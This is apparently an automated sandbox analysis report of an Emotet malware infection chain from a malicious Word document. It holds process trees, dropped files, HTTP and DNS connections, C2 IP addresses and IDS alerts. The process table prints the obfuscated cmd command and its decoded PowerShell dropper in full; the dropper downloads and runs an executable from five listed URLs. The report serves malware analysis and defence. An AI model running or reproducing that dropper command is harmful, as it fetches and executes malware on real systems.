URL: | http://mydesigncell.com/yoLI-7wjq2yJkXFbOWxv_cRSXIGVE-sWf/ |
Full analysis: | https://app.any.run/tasks/ae493dc4-ceaf-44ab-af30-543bfe53489e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 21:01:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 40E832689F4EDA879BA23E5F2AE2A577 |
SHA1: | B4DD3355DD61F282352E632BFF375DC0522A4480 |
SHA256: | 21C6280D11D2D3D78015F47980FA4758C7D80814AF81B3F0455EB3D24A85A771 |
SSDEEP: | 3:N1KTgyAJFGTHyDsMWBVgnK:CFW6yYBzgK |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2936 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3188 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2936 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4000 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\SWIFT_593157BFJQFO_12_18_18[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3228 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3748 | c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c %pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2268 | CmD /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | Cmd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3800 | C:\Windows\system32\cmd.exe /S /D /c" ecHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3104 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3512 | powershell $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3072 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | — | powershell.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2936 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2936 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2936 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF119D695415755043.TMP | — | |
MD5:— | SHA256:— | |||
4000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRBAD7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_53FF669A-E00A-4D08-9C9D-EC924D52396C.0\DC8B67F0.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2936 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF4D25D20DAB649905.TMP | — | |
MD5:— | SHA256:— | |||
2936 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{22457111-0308-11E9-834A-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
4000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FDFB437E.wmf | — | |
MD5:— | SHA256:— | |||
4000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCA3C3C.wmf | — | |
MD5:— | SHA256:— | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_53FF669A-E00A-4D08-9C9D-EC924D52396C.0\~DF0BEC88B95BBB82CB.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3188 | iexplore.exe | GET | 200 | 67.20.76.105:80 | http://mydesigncell.com/yoLI-7wjq2yJkXFbOWxv_cRSXIGVE-sWf/ | US | document | 91.6 Kb | suspicious |
3796 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
3512 | powershell.exe | GET | 200 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq/ | CA | executable | 124 Kb | malicious |
3796 | archivesymbol.exe | GET | — | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | — | — | malicious |
3796 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
3512 | powershell.exe | GET | 301 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq | CA | html | 236 b | malicious |
2936 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2936 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3188 | iexplore.exe | 67.20.76.105:80 | mydesigncell.com | Unified Layer | US | suspicious |
3512 | powershell.exe | 158.69.193.16:80 | kliksys.com | OVH SAS | CA | suspicious |
3796 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
3796 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
3796 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3796 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
3796 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
3796 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
mydesigncell.com |
| suspicious |
kliksys.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3188 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Obfuscated Javascript // ptth |
3512 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3512 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3512 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3512 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3512 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3796 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3796 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3796 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3796 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |